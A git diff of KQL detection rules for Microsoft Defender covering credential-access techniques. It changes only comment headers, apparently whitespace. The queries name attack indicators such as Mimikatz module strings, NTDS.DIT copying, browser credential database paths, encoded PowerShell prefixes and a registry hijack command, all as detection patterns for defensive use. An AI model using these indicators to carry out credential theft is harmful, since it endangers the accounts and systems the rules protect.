+++ b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql
@@ -1,12 +1,12 @@
-// Title: Shadow Copies Creation Using Operating Systems Utilities
-// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
-// Date: 2019-10-22
-// Level: medium
-// Description: Shadow Copies creation using operating systems utilities, possible credential access
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003
-// False Positives:
-// - Legitimate administrator working with shadow copies, access for backup purposes
-
-DeviceProcessEvents
+// Title: Shadow Copies Creation Using Operating Systems Utilities
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: medium
+// Description: Shadow Copies creation using operating systems utilities, possible credential access
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003
+// False Positives:
+// - Legitimate administrator working with shadow copies, access for backup purposes
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "shadow" and ProcessCommandLine contains "create") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql
index 77f36c3a..d706b07e 100644
--- a/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql
+++ b/KQL/rules/Credential Access/sqlite_chromium_profile_data_db_access.kql
@@ -1,10 +1,10 @@
-// Title: SQLite Chromium Profile Data DB Access
-// Author: TropChaud
-// Date: 2022-12-19
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
-
-DeviceProcessEvents
+// Title: SQLite Chromium Profile Data DB Access
+// Author: TropChaud
+// Date: 2022-12-19
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.t1555.003, attack.collection, attack.t1005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\User Data\\" or ProcessCommandLine contains "\\Opera Software\\" or ProcessCommandLine contains "\\ChromiumViewer\\") and (ProcessCommandLine contains "Login Data" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Web Data" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql
index 0bbedf19..2c1b05c3 100644
--- a/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql
+++ b/KQL/rules/Credential Access/sqlite_firefox_profile_data_db_access.kql
@@ -1,10 +1,10 @@
-// Title: SQLite Firefox Profile Data DB Access
-// Author: frack113
-// Date: 2022-04-08
-// Level: high
-// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005
-
-DeviceProcessEvents
+// Title: SQLite Firefox Profile Data DB Access
+// Author: frack113
+// Date: 2022-04-08
+// Level: high
+// Description: Detect usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1539, attack.collection, attack.t1005
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "places.sqlite") and (ProcessVersionInfoProductName =~ "SQLite" or (FolderPath endswith "\\sqlite.exe" or FolderPath endswith "\\sqlite3.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
index 8933c2c7..d5163b72 100644
--- a/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
+++ b/KQL/rules/Credential Access/suspicious_file_access_to_browser_credential_storage.kql
@@ -1,16 +1,16 @@
-// Title: Suspicious File Access to Browser Credential Storage
-// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
-// Date: 2025-05-22
-// Level: low
-// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
-// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
-// This behavior is often commonly observed in credential stealing malware.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
-// False Positives:
-// - Antivirus, Anti-Spyware, Anti-Malware Software
-// - Legitimate software accessing browser data for synchronization or backup purposes.
-// - Legitimate software installed on partitions other than "C:\"
-
-DeviceFileEvents
+// Title: Suspicious File Access to Browser Credential Storage
+// Author: frack113, X__Junior (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems), Parth-FourCore
+// Date: 2025-05-22
+// Level: low
+// Description: Detects file access to browser credential storage paths by non-browser processes, which may indicate credential access attempts.
+// Adversaries may attempt to access browser credential storage to extract sensitive information such as usernames and passwords or cookies.
+// This behavior is often commonly observed in credential stealing malware.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003, attack.discovery, attack.t1217
+// False Positives:
+// - Antivirus, Anti-Spyware, Anti-Malware Software
+// - Legitimate software accessing browser data for synchronization or backup purposes.
+// - Legitimate software installed on partitions other than "C:\"
+
+DeviceFileEvents
 | where ((FileName contains "\\Sputnik\\Sputnik" or FileName contains "\\MapleStudio\\ChromePlus" or FileName contains "\\QIP Surf" or FileName contains "\\BlackHawk" or FileName contains "\\7Star\\7Star" or FileName contains "\\CatalinaGroup\\Citrio" or FileName contains "\\Google\\Chrome" or FileName contains "\\Coowon\\Coowon" or FileName contains "\\CocCoc\\Browser" or FileName contains "\\uCozMedia\\Uran" or FileName contains "\\Tencent\\QQBrowser" or FileName contains "\\Orbitum" or FileName contains "\\Slimjet" or FileName contains "\\Iridium" or FileName contains "\\Vivaldi" or FileName contains "\\Chromium" or FileName contains "\\GhostBrowser" or FileName contains "\\CentBrowser" or FileName contains "\\Xvast" or FileName contains "\\Chedot" or FileName contains "\\SuperBird" or FileName contains "\\360Browser\\Browser" or FileName contains "\\360Chrome\\Chrome" or FileName contains "\\Comodo\\Dragon" or FileName contains "\\BraveSoftware\\Brave-Browser" or FileName contains "\\Torch" or FileName contains "\\UCBrowser\\" or FileName contains "\\Blisk" or FileName contains "\\Epic Privacy Browser" or FileName contains "\\Nichrome" or FileName contains "\\Amigo" or FileName contains "\\Kometa" or FileName contains "\\Xpom" or FileName contains "\\Microsoft\\Edge" or FileName contains "\\Liebao7Default\\EncryptedStorage" or FileName contains "\\AVAST Software\\Browser" or FileName contains "\\Kinza" or FileName contains "\\Mozilla\\SeaMonkey\\" or FileName contains "\\Comodo\\IceDragon\\" or FileName contains "\\8pecxstudios\\Cyberfox\\" or FileName contains "\\FlashPeak\\SlimBrowser\\" or FileName contains "\\Moonchild Productions\\Pale Moon\\") and (FileName contains "\\Profiles\\" or FileName contains "\\User Data") and ((FileName contains "\\Login Data" or FileName contains "\\Cookies" or FileName contains "\\EncryptedStorage" or FileName contains "\\WebCache\\") or 
(FileName endswith "cert9.db" or FileName endswith "cookies.sqlite" or FileName endswith "formhistory.sqlite" or FileName endswith "key3.db" or FileName endswith "key4.db" or FileName endswith "Login Data.sqlite" or FileName endswith "logins.json" or FileName endswith "places.sqlite"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or (InitiatingProcessFolderPath endswith "\\Sputnik.exe" or InitiatingProcessFolderPath endswith "\\ChromePlus.exe" or InitiatingProcessFolderPath endswith "\\QIP Surf.exe" or InitiatingProcessFolderPath endswith "\\BlackHawk.exe" or InitiatingProcessFolderPath endswith "\\7Star.exe" or InitiatingProcessFolderPath endswith "\\Sleipnir5.exe" or InitiatingProcessFolderPath endswith "\\Citrio.exe" or InitiatingProcessFolderPath endswith "\\Chrome SxS.exe" or InitiatingProcessFolderPath endswith "\\Chrome.exe" or InitiatingProcessFolderPath endswith "\\Coowon.exe" or InitiatingProcessFolderPath endswith "\\CocCocBrowser.exe" or InitiatingProcessFolderPath endswith "\\Uran.exe" or InitiatingProcessFolderPath endswith "\\QQBrowser.exe" or InitiatingProcessFolderPath endswith "\\Orbitum.exe" or InitiatingProcessFolderPath endswith "\\Slimjet.exe" or InitiatingProcessFolderPath endswith "\\Iridium.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Chromium.exe" or InitiatingProcessFolderPath endswith "\\GhostBrowser.exe" or InitiatingProcessFolderPath endswith "\\CentBrowser.exe" or InitiatingProcessFolderPath endswith "\\Xvast.exe" or InitiatingProcessFolderPath endswith "\\Chedot.exe" or InitiatingProcessFolderPath endswith "\\SuperBird.exe" or InitiatingProcessFolderPath endswith "\\360Browser.exe" or InitiatingProcessFolderPath endswith "\\360Chrome.exe" or 
InitiatingProcessFolderPath endswith "\\dragon.exe" or InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\torch.exe" or InitiatingProcessFolderPath endswith "\\UCBrowser.exe" or InitiatingProcessFolderPath endswith "\\BliskBrowser.exe" or InitiatingProcessFolderPath endswith "\\Epic Privacy Browser.exe" or InitiatingProcessFolderPath endswith "\\nichrome.exe" or InitiatingProcessFolderPath endswith "\\AmigoBrowser.exe" or InitiatingProcessFolderPath endswith "\\KometaBrowser.exe" or InitiatingProcessFolderPath endswith "\\XpomBrowser.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\LiebaoBrowser.exe" or InitiatingProcessFolderPath endswith "\\AvastBrowser.exe" or InitiatingProcessFolderPath endswith "\\Kinza.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\icedragon.exe" or InitiatingProcessFolderPath endswith "\\cyberfox.exe" or InitiatingProcessFolderPath endswith "\\SlimBrowser.exe" or InitiatingProcessFolderPath endswith "\\palemoon.exe") or (InitiatingProcessFolderPath contains "\\Sputnik\\" or InitiatingProcessFolderPath contains "\\MapleStudio\\" or InitiatingProcessFolderPath contains "\\QIP Surf\\" or InitiatingProcessFolderPath contains "\\BlackHawk\\" or InitiatingProcessFolderPath contains "\\7Star\\" or InitiatingProcessFolderPath contains "\\Fenrir Inc\\" or InitiatingProcessFolderPath contains "\\CatalinaGroup\\" or InitiatingProcessFolderPath contains "\\Google\\" or InitiatingProcessFolderPath contains "\\Coowon\\" or InitiatingProcessFolderPath contains "\\CocCoc\\" or InitiatingProcessFolderPath contains "\\uCozMedia\\" or InitiatingProcessFolderPath contains "\\Tencent\\" or InitiatingProcessFolderPath contains "\\Orbitum\\" or InitiatingProcessFolderPath contains "\\Slimjet\\" or InitiatingProcessFolderPath contains "\\Iridium\\" or InitiatingProcessFolderPath contains "\\Vivaldi\\" or 
InitiatingProcessFolderPath contains "\\Chromium\\" or InitiatingProcessFolderPath contains "\\GhostBrowser\\" or InitiatingProcessFolderPath contains "\\CentBrowser\\" or InitiatingProcessFolderPath contains "\\Xvast\\" or InitiatingProcessFolderPath contains "\\Chedot\\" or InitiatingProcessFolderPath contains "\\SuperBird\\" or InitiatingProcessFolderPath contains "\\360Browser\\" or InitiatingProcessFolderPath contains "\\360Chrome\\" or InitiatingProcessFolderPath contains "\\Comodo\\" or InitiatingProcessFolderPath contains "\\BraveSoftware\\" or InitiatingProcessFolderPath contains "\\Torch\\" or InitiatingProcessFolderPath contains "\\UCBrowser\\" or InitiatingProcessFolderPath contains "\\Blisk\\" or InitiatingProcessFolderPath contains "\\Epic Privacy Browser\\" or InitiatingProcessFolderPath contains "\\Nichrome\\" or InitiatingProcessFolderPath contains "\\Amigo\\" or InitiatingProcessFolderPath contains "\\Kometa\\" or InitiatingProcessFolderPath contains "\\Xpom\\" or InitiatingProcessFolderPath contains "\\Microsoft\\" or InitiatingProcessFolderPath contains "\\Liebao7\\" or InitiatingProcessFolderPath contains "\\AVAST Software\\" or InitiatingProcessFolderPath contains "\\Kinza\\" or InitiatingProcessFolderPath contains "\\Mozilla\\" or InitiatingProcessFolderPath contains "\\8pecxstudios\\" or InitiatingProcessFolderPath contains "\\FlashPeak\\" or InitiatingProcessFolderPath contains "\\Moonchild Productions\\") or (InitiatingProcessFolderPath =~ "System" and InitiatingProcessParentFileName =~ "Idle")))) and (not(((InitiatingProcessFolderPath contains "\\Microsoft\\Windows Defender\\" and (InitiatingProcessFolderPath endswith "\\MpCopyAccelerator.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe")) or InitiatingProcessParentFileName =~ "msiexec.exe" or InitiatingProcessFolderPath endswith "\\everything.exe" or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at 
end of file
diff --git a/KQL/rules/Credential Access/suspicious_history_file_operations.kql b/KQL/rules/Credential Access/suspicious_history_file_operations.kql
index 73d5d226..a9250bc4 100644
--- a/KQL/rules/Credential Access/suspicious_history_file_operations.kql
+++ b/KQL/rules/Credential Access/suspicious_history_file_operations.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious History File Operations
-// Author: Mikhail Larin, oscd.community
-// Date: 2020-10-17
-// Level: medium
-// Description: Detects commandline operations on shell history files
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.003
-// False Positives:
-// - Legitimate administrative activity
-// - Legitimate software, cleaning hist file
-
-DeviceProcessEvents
+// Title: Suspicious History File Operations
+// Author: Mikhail Larin, oscd.community
+// Date: 2020-10-17
+// Level: medium
+// Description: Detects commandline operations on shell history files
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.003
+// False Positives:
+// - Legitimate administrative activity
+// - Legitimate software, cleaning hist file
+
+DeviceProcessEvents
 | where ProcessCommandLine contains ".bash_history" or ProcessCommandLine contains ".zsh_history" or ProcessCommandLine contains ".zhistory" or ProcessCommandLine contains ".history" or ProcessCommandLine contains ".sh_history" or ProcessCommandLine contains "fish_history"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_key_manager_access.kql b/KQL/rules/Credential Access/suspicious_key_manager_access.kql
index 7d436e24..d9bf2d8d 100644
--- a/KQL/rules/Credential Access/suspicious_key_manager_access.kql
+++ b/KQL/rules/Credential Access/suspicious_key_manager_access.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Key Manager Access
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-04-21
-// Level: high
-// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.004
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious Key Manager Access
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-04-21
+// Level: high
+// Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.004
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "keymgr" and ProcessCommandLine contains "KRShowKeyMgr") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql
index 565ac3f8..17947643 100644
--- a/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql
+++ b/KQL/rules/Credential Access/suspicious_process_patterns_ntds_dit_exfil.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Process Patterns NTDS.DIT Exfil
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-03-11
-// Level: high
-// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-
-DeviceProcessEvents
+// Title: Suspicious Process Patterns NTDS.DIT Exfil
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-11
+// Level: high
+// Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "ac i ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "/c copy " and ProcessCommandLine contains "\\windows\\ntds\\ntds.dit") or (ProcessCommandLine contains "activate instance ntds" and ProcessCommandLine contains "create full") or (ProcessCommandLine contains "powershell" and ProcessCommandLine contains "ntds.dit") or ((FolderPath endswith "\\NTDSDump.exe" or FolderPath endswith "\\NTDSDumpEx.exe") or (ProcessCommandLine contains "ntds.dit" and ProcessCommandLine contains "system.hiv") or ProcessCommandLine contains "NTDSgrab.ps1")) or (((InitiatingProcessFolderPath contains "\\apache" or InitiatingProcessFolderPath contains "\\tomcat" or InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\") or (FolderPath contains "\\apache" or FolderPath contains "\\tomcat" or FolderPath contains "\\AppData\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Public\\" or FolderPath contains "\\PerfLogs\\")) and ProcessCommandLine contains "ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql
index b4a69993..4903a241 100644
--- a/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql
+++ b/KQL/rules/Credential Access/suspicious_reg_add_open_command.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Reg Add Open Command
-// Author: frack113
-// Date: 2021-12-20
-// Level: medium
-// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003
-
-DeviceProcessEvents
+// Title: Suspicious Reg Add Open Command
+// Author: frack113
+// Date: 2021-12-20
+// Level: medium
+// Description: Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/ve " and ProcessCommandLine contains "/d") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings\\shell\\open\\command" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "DelegateExecute") or (ProcessCommandLine contains "reg" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "hkcu\\software\\classes\\ms-settings")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql
index f7bbaceb..b074209f 100644
--- a/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql
+++ b/KQL/rules/Credential Access/suspicious_serv_u_process_pattern.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Serv-U Process Pattern
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-14
-// Level: high
-// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555, cve.2021-35211
-// False Positives:
-// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution
-
-DeviceProcessEvents
+// Title: Suspicious Serv-U Process Pattern
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-14
+// Level: high
+// Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555, cve.2021-35211
+// False Positives:
+// - Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe") and InitiatingProcessFolderPath endswith "\\Serv-U.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql
index f532a1dd..706dd2f1 100644
--- a/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql
+++ b/KQL/rules/Credential Access/suspicious_system_user_process_creation.kql 
@@ -1,14 +1,14 @@
-// Title: Suspicious SYSTEM User Process Creation
-// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
-// Date: 2021-12-20
-// Level: high
-// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027
-// False Positives:
-// - Administrative activity
-// - Scripts and administrative tools used in the monitored environment
-// - Monitoring activity
-
-DeviceProcessEvents
+// Title: Suspicious SYSTEM User Process Creation
+// Author: Florian Roth (Nextron Systems), David ANDRE (additional keywords)
+// Date: 2021-12-20
+// Level: high
+// Description: Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.privilege-escalation, attack.t1134, attack.t1003, attack.t1027
+// False Positives:
+// - Administrative activity
+// - Scripts and administrative tools used in the monitored environment
+// - Monitoring activity
+
+DeviceProcessEvents
 | where (((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")) and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\wscript.exe") or ProcessCommandLine matches regex "net\\s+user\\s+" or (ProcessCommandLine contains " -NoP " or ProcessCommandLine contains " -W Hidden " or ProcessCommandLine contains " -decode " or ProcessCommandLine contains " /decode " or ProcessCommandLine contains " /urlcache " or ProcessCommandLine contains " -urlcache " or 
(ProcessCommandLine contains " -e" and ProcessCommandLine contains " JAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SUVYI") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " SQBFAFgA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aWV4I") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " IAB") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " PAA") or (ProcessCommandLine contains " -e" and ProcessCommandLine contains " aQBlAHgA") or ProcessCommandLine contains "vssadmin delete shadows" or ProcessCommandLine contains "reg SAVE HKLM" or ProcessCommandLine contains " -ma " or ProcessCommandLine contains "Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains ".downloadstring(" or ProcessCommandLine contains ".downloadfile(" or ProcessCommandLine contains " /ticket:" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "event::clear" or ProcessCommandLine contains "event::drop" or ProcessCommandLine contains "id::modify" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "misc::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "sid::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "vault::cred" or ProcessCommandLine contains "vault::list" or ProcessCommandLine contains " p::d " or ProcessCommandLine contains ";iex(" or ProcessCommandLine contains "MiniDump"))) and (not((InitiatingProcessFolderPath contains ":\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (ProcessCommandLine contains " -ma " and (FolderPath contains ":\\Program Files (x86)\\Java\\" or FolderPath contains ":\\Program Files\\Java\\") and FolderPath endswith "\\bin\\jp2launcher.exe" and (InitiatingProcessFolderPath 
contains ":\\Program Files (x86)\\Java\\" or InitiatingProcessFolderPath contains ":\\Program Files\\Java\\") and InitiatingProcessFolderPath endswith "\\bin\\javaws.exe") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "127.0.0.1" and ProcessCommandLine contains " -n ") or (FolderPath endswith "\\PING.EXE" and InitiatingProcessCommandLine contains "\\DismFoDInstall.cmd"))))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql
index a5a219a1..8b6a6c94 100644
--- a/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql
+++ b/KQL/rules/Credential Access/suspicious_sysvol_domain_group_policy_access.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious SYSVOL Domain Group Policy Access
-// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
-// Date: 2018-04-09
-// Level: medium
-// Description: Detects Access to Domain Group Policies stored in SYSVOL
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.006
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious SYSVOL Domain Group Policy Access
+// Author: Markus Neis, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-04-09
+// Level: medium
+// Description: Detects Access to Domain Group Policies stored in SYSVOL
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.006
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\SYSVOL\\" and ProcessCommandLine contains "\\policies\\"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql
index b745ddf8..d3577940 100644
--- a/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql
+++ b/KQL/rules/Credential Access/suspicious_teams_application_related_objectacess_event.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Teams Application Related ObjectAcess Event
-// Author: @SerkinValery
-// Date: 2022-09-16
-// Level: high
-// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1528
-
-DeviceRegistryEvents
+// Title: Suspicious Teams Application Related ObjectAcess Event
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: high
+// Description: Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\Microsoft\\Teams\\Cookies" or RegistryKey contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
index 5a63271a..d5947d9a 100644
--- a/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
+++ b/KQL/rules/Credential Access/suspicious_usage_of_active_directory_diagnostic_tool_ntdsutil_exe_.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-09-14
-// Level: medium
-// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-// False Positives:
-// - Legitimate usage to restore snapshots
-// - Legitimate admin activity
-
-DeviceProcessEvents
+// Title: Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-14
+// Level: medium
+// Description: Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate usage to restore snapshots
+// - Legitimate admin activity
+
+DeviceProcessEvents
